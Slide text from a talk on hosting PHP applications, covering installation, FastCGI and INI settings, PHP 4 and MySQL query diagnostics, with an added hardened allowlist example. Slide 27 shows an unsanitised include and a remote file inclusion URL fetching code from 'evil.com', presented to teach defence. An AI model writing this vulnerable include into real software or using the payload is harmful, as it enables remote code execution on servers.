5. I live in the wonderful city of Bruges
MPBecker - Bruges by Night
http://www.flickr.com/photos/galverson2/3715965933
6. Follow me on Twitter: @ThijsFeryn
Rate my talk: http://joind.in/1541
Read my blog: http://blog.feryn.eu
9. Chapter I: The hoster, a genuine stakeholder in the PHP universe
10. Stakeholders
[Diagram of stakeholders: Customer, Development company, Hoster, PHP community. Role labels shown: Endusers, MGMT, Devs, Design, PM, Internal IT, Sales, QA, Internal Systeam, Consultants]
11. Stakeholders
Somewhere along the road ... Your app needs to be hosted
12. Goals & motives
Our goals & motives are the same as yours:
• It has to work
• It has to perform
• It has to scale
• It has to be secure
• It has to be available
18. Installing using a package manager (APT/Aptitude)
Install PHP:
server$ apt-get install php5
Install MySQL library for PHP:
server$ apt-get install php5-mysql
19. SAPI ... schmapi
               Mod_php            FastCGI                    CLI
Web            Apache module      gateway                    -
Process        Apache process     php-cgi                    php
Configuration  Apache conf files  wrapper                    on the fly
User           Apache user        shell user or suexec user  shell user
20. FastCGI
Example config:
• Apache handler
<IfModule mod_fcgid.c>
    SuexecUserGroup dev dev
    PHP_Fix_Pathinfo_Enable 1
    <Directory /var/www/dev/www/>
        Options +ExecCGI
        AllowOverride All
        AddHandler fcgid-script .php
        FCGIWrapper /var/www/dev/etc/fcgi.wrapper .php
        Order allow,deny
        Allow from all
    </Directory>
</IfModule>
23. INI settings: tales of good & evil
Defining INI settings:
• Php.ini
• Ini_set()
• “-d”
• php_value
• php_flag
• php_admin_value
• php_admin_flag
24. INI settings: tales of good & evil
Memory_limit:
Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 35 bytes)
26. INI settings: tales of good & evil
Safe_mode & Open_basedir:
<IfModule mod_php5.c>
    php_admin_flag engine on
    php_admin_flag safe_mode off
    php_admin_value open_basedir "/var/www/vhosts/website.com/httpdocs:/tmp"
</IfModule>
27. INI settings: tales of good & evil
Allow_url_fopen:
<?php
$lang= $_GET['lang'];
require("$lang.php");
http://domain.ext/index.php?lang=http://evil.com/hack.txt?
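The include on this slide next to a hardened form, as an added example that is not from the original slides: the request value is only compared against a fixed allowlist and is never concatenated into the path. LANG_DIR, the language codes and resolve_lang_file() are assumptions made for the illustration.

```php
<?php
// Added example, not part of the original talk.
// Vulnerable form from the slide: require("$lang.php"); with $lang taken from $_GET.
// Host-side setting that blocks the remote variant: allow_url_include = Off (php.ini).

const LANG_DIR      = __DIR__ . '/lang';     // assumed directory holding the language files
const ALLOWED_LANGS = ['en', 'nl', 'fr'];    // constructed sample allowlist
const DEFAULT_LANG  = 'en';

/**
 * Map untrusted input to a path built only from allowlisted values.
 * Anything that is not an exact allowlist match falls back to the default,
 * so URLs, "../" sequences and array parameters never reach require.
 */
function resolve_lang_file($requested): string
{
    if (!is_string($requested) || !in_array($requested, ALLOWED_LANGS, true)) {
        $requested = DEFAULT_LANG;
    }
    return LANG_DIR . '/' . $requested . '.php';
}

// Constructed sample inputs, including the value from the slide's URL.
$samples = ['nl', 'http://evil.com/hack.txt?', '../../etc/passwd', ['x'], null];
foreach ($samples as $input) {
    echo json_encode($input, JSON_UNESCAPED_SLASHES), ' => ',
         resolve_lang_file($input), PHP_EOL;
}

// In the application itself the call would be:
//   require resolve_lang_file($_GET['lang'] ?? DEFAULT_LANG);
```

Only the first sample resolves to lang/nl.php; every other input resolves to lang/en.php.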
30. PHP 4: End of life, but far from dead
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in test.php on line 4
63. mysql> explain SELECT field1, (SELECT COUNT(*) FROM table2 WHERE field3 = table1.id) FROM table1 WHERE field2 = 1 ORDER BY field4 DESC limit 12,12;
*************************** 1. row ***************************
           id: 1
  select_type: PRIMARY
        table: table1
         type: ALL
possible_keys: approved
          key: approved
      key_len: NULL
          ref: NULL
         rows: 3143
        Extra: Using where; Using filesort
*************************** 2. row ***************************
           id: 2
  select_type: DEPENDENT SUBQUERY
        table: table2
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 1005
        Extra: Using where
64. mysql> show processlist;
+-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
| Id    | User | Host      | db | Command | Time | State                | Info                                            |
+-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
| 63515 | root | localhost | db | Query   |    0 | NULL                 | show processlist                                |
| 81763 | root | localhost | db | Sleep   |  105 |                      | NULL                                            |
| 85187 | root | localhost | db | Query   |    0 | Sending data         | SELECT data from someTable where field = 'val'  |
| 82701 | root | localhost | db | Query   |    0 | Copying to tmp table | SELECT data from someTable where field='val2'   |
| 82709 | root | localhost | db | Query   |    0 | Sorting result       | SELECT data from someTable where order by field |
| 82716 | root | localhost | db | Query   |    0 | Opening tables       | SELECT data from someOtherTable                 |
+-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
72. Summary
1. Hosters are a genuine stakeholder in the PHP universe
2. PHP is highly flexible & configurable. Hosters have to ensure a decent setup
3. PHP has a lot to offer feature-wise
4. PHP attracts a crowd and brings a lot of people together from different industries (e.g. hosters)
5. Lots of abuse cases are PHP related, but that’s not the fault of PHP itself
6. PHP itself doesn’t scale *that* well, but is flexible enough to ensure scalability via extra tools